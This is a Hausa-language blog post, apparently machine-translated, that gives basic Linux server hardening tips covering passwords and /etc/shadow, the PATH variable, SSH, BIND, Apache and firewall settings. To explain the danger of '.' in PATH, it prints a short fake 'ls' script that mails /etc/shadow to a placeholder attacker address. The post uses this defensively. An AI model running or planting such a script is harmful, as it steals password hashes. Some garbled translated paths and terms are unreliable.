Nasihu na Tsaro don Linux (Server) (Sashe na 1)

@Jlcmux

5 minti

Ban taɓa buga komai a kan shafin yanar gizon ba na dogon lokaci kuma zan so in ba ku wasu shawarwarin da aka ɗauka daga wani littafi cewa, (Daga cikin wasu). Na same shi a Jami'a kuma kawai na karanta kuma kodayake gaskiya ya ɗan tsufa kuma dabarun da aka nuna ba su yiwuwa su yi aiki idan aka ba da canjin tsarin, su ma abubuwan ban sha'awa ne da za a iya nunawa. 9788448140502

Ina so in fayyace cewa su shawarwari ne da suka dace da tsarin Linux wanda ake amfani da shi azaman sabar, a matsakaici ko wataƙila babba, tunda a matakin mai amfani da tebur, kodayake ana iya amfani da su, ba za su iya da amfani ba.

Ina kuma gargadin cewa su masu sauki ne cikin sauri kuma ba zan yi dogon bayani ba, kodayake na yi niyyar yin wani takamaiman bayani dalla-dalla a kan wani batun. Amma zan ga hakan daga baya. Bari mu fara.

Manufofin shiga. 

Kodayake yana kama da jumla mai ma'ana, samun kyakkyawan tsarin kalmar sirri yana haifar da banbanci tsakanin tsarin rauni ko a'a. Hare-hare kamar "zaluncin karfi" suna amfani da samun mummunar kalmar sirri don samun damar tsarin. Mafi yawan nasihu sune:

  • Hada babban harafi da karamin rubutu.
  • Yi amfani da haruffa na musamman.
  • Lambobi.
  • Fiye da lambobi 6 (da fatan sama da 8).

Baya ga wannan, bari muyi la'akari da mahimman fayiloli guda biyu.  / sauransu / passwd da / sauransu / inuwa.

Wani abu mai mahimmanci shine fayil din / sauransu / passwd Baya ga bamu sunan mai amfani, uid din sa, folder folder, bash .. da dai sauransu. a wasu lokuta kuma yana nuna maɓallin ɓoyayyen mai amfani.

 Bari muyi la'akari da kayan aikin sa.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

mai amfani: cryptkey: uid: gid: hanyar :: hanyar: bash

Babban matsala anan, shine wannan takamaiman fayil ɗin yana da izini -rw-r - r– wanda ke nufin cewa ya karanta izini ga kowane mai amfani akan tsarin. kuma samun maballin sirri ba shi da wahalar gano ainihin.

Wannan shine dalilin da yasa fayil din ya wanzu / sauransu / inuwa Wannan shine fayil ɗin da aka adana duk maɓallan mai amfani, a tsakanin sauran abubuwa. Wannan fayil ɗin yana da izinin izini don haka babu mai amfani da zai iya karanta shi.

Don gyara wannan to, dole ne mu je fayil ɗin / sauransu / passwd kuma canza maɓallin ɓoyayyen zuwa "x", wannan zai adana mabuɗin kawai a cikin fayil ɗinmu / sauransu / inuwa

desdelinux:x:500:501::/home/usuario1:/bin/bash

Matsaloli tare da PATH da .bashrc da sauransu.

Lokacin da mai amfani ya aiwatar da umarni a kan na'urar su, harsashin yana neman wannan umarnin a cikin jerin kundin adireshin da ke cikin yanayin yanayin PATH.

Idan ka buga "echo $ PATH" a cikin na'urar wasan wuta zai fitar da wani abu kamar haka.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Kowane ɗayan waɗannan manyan fayiloli shine inda harsashi zai nemi umarnin da aka rubuta don aiwatar dashi. Ya "." yana nufin cewa babban fayil na farko don bincika shine babban fayil ɗin daga inda aka aiwatar da umarnin.

A ce akwai mai amfani "Carlos" kuma wannan mai amfani yana son "aikata mugunta." Wannan mai amfanin na iya barin fayil ɗin da ake kira "ls" a cikin babban fayil ɗin sa, kuma a cikin wannan fayil ɗin yana aiwatar da umarni kamar:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

Kuma idan tushen mai amfani da abubuwan makoma, yayi kokarin jera manyan jakunkunan cikin babban fayil din carlos (kamar yadda yake fara neman umarnin a cikin wannan babban fayil din, ba da gangan ba zai aika da fayil din tare da kalmomin shiga zuwa wannan imel sannan kuma za'a sanya manyan fayiloli kuma ba zai gano ba sai da latti.

Don kaucewa hakan dole ne mu kawar da "." na PATH mai canzawa.

Haka nan, fayiloli kamar /.bashrc, /.bashrc_profile, ./.login ya kamata a duba su sannan a bincika cewa babu "." a cikin hanyar PATH, kuma a zahiri daga fayiloli kamar wannan, zaku iya canza maƙasudin takamaiman umarni.

Nasihu tare da sabis:

SHH

  • Kashe fasalin 1 na yarjejeniyar ssh a cikin fayil sshd_config.
  • Kada ku bari tushen mai amfani ya shiga ta ssh.
  • Fayilolin da manyan fayilolin ssh_host_key, ssh_host_dsa_key da ssh_host_rsa_key yakamata a karanta mai amfani kawai.

BIND

  • Canja sakon maraba a cikin fayil din.conf don kada ya nuna lambar sigar
  • Iyakance canja wurin yanki, kuma kawai ba shi damar ƙungiyar da ke buƙatar sa.

Apache

  • Hana sabis daga nuna sigar ku a cikin saƙon maraba. Shirya fayil na httpd.conf kuma ƙara ko gyara layin:  

ServerSignature Off
ServerTokens Prod

  • Kashe lissafin atomatik
  • Sanya apache don bautar da fayiloli masu mahimmanci kamar .htacces, * .inc, * .jsp .. da dai sauransu
  • Cire shafukan mutum ko samfurin daga sabis
  • Gudun apache a cikin yanayin da aka ƙayyade

Tsaro na cibiyar sadarwa.

Yana da mahimmanci a rufe duk abubuwan shigarwa zuwa tsarinku daga cibiyar sadarwar waje, ga wasu mahimman bayanai don hana masu kutse daga yin bincike da samun bayanai daga cibiyar sadarwar ku.

Toshe hanyoyin ICMP

Dole ne a saita katangar don toshe duk nau'ikan ICMP masu shigowa da masu fita da amsa kuwwa. Da wannan kake gujewa hakan, alal misali, na'urar daukar hotan takardu da ke neman kayan aiki kai tsaye a cikin kewayon IP zai gano ku. 

Guji hoton ping na TCP.

Hanya ɗaya da za'a bincika tsarin ku shine TCP ping scan. A ce a kan sabar ka akwai sabar Apache a tashar jiragen ruwa ta 80. Mai kutse zai iya aika buƙatar ACK zuwa wannan tashar, da wannan, idan tsarin ya amsa, kwamfutar za ta rayu kuma za ta bincika sauran tashar jiragen ruwan.

Don wannan, Firewall ɗinka koyaushe yana da zaɓi "wayar da kan jama'a" kuma ya kamata ya watsar da duk fakitin ACK waɗanda basu dace da haɗin TCP ko zaman da aka riga aka kafa ba.

Wasu ƙarin nasihu:

  • Yi amfani da tsarin IDS don gano sifofin tashar jiragen ruwa zuwa cibiyar sadarwar ku.
  • Sanya Firewall saboda kar ya aminta da saitin tashar tashar jirgin.

Wannan saboda wasu sikanin suna amfani da tashar tushe ta "karya" kamar 20 ko 53, tunda yawancin tsarin sun aminta da wadannan tashoshin saboda sun saba da wani tsari na ftp ko DNS.

NOTE: Ka tuna cewa yawancin matsalolin da aka nuna a cikin wannan sakon an riga an warware su a kusan dukkanin rarrabawar yanzu. Amma ba abin da zafi idan ka sami mahimman bayanai game da waɗannan matsalolin don kar su same ka.

NOTE: Daga baya zan ga takamaiman batun kuma zan yi rubutu tare da ƙarin cikakkun bayanai da bayanai na yanzu.

Yabawa kowa karatu.

Na gode.


Bar tsokaci

Your email address ba za a buga. Bukata filayen suna alama da *

*

*

  1. Wanda ke da alhakin bayanan: Miguel Ángel Gatón
  2. Manufar bayanan: Sarrafa SPAM, sarrafa sharhi.
  3. Halacci: Yarda da yarda
  4. Sadarwar bayanan: Ba za a sanar da wasu bayanan ga wasu kamfanoni ba sai ta hanyar wajibcin doka.
  5. Ajiye bayanai: Bayanin yanar gizo wanda Occentus Networks (EU) suka dauki nauyi
  6. Hakkoki: A kowane lokaci zaka iyakance, dawo da share bayanan ka.

  1.   fadakarwa m
    sa 8 shekaru

    Ina matukar son labarin kuma ina sha'awar batun, ina baku shawarar ku ci gaba da loda abun ciki.

    Amsa zuwa informatico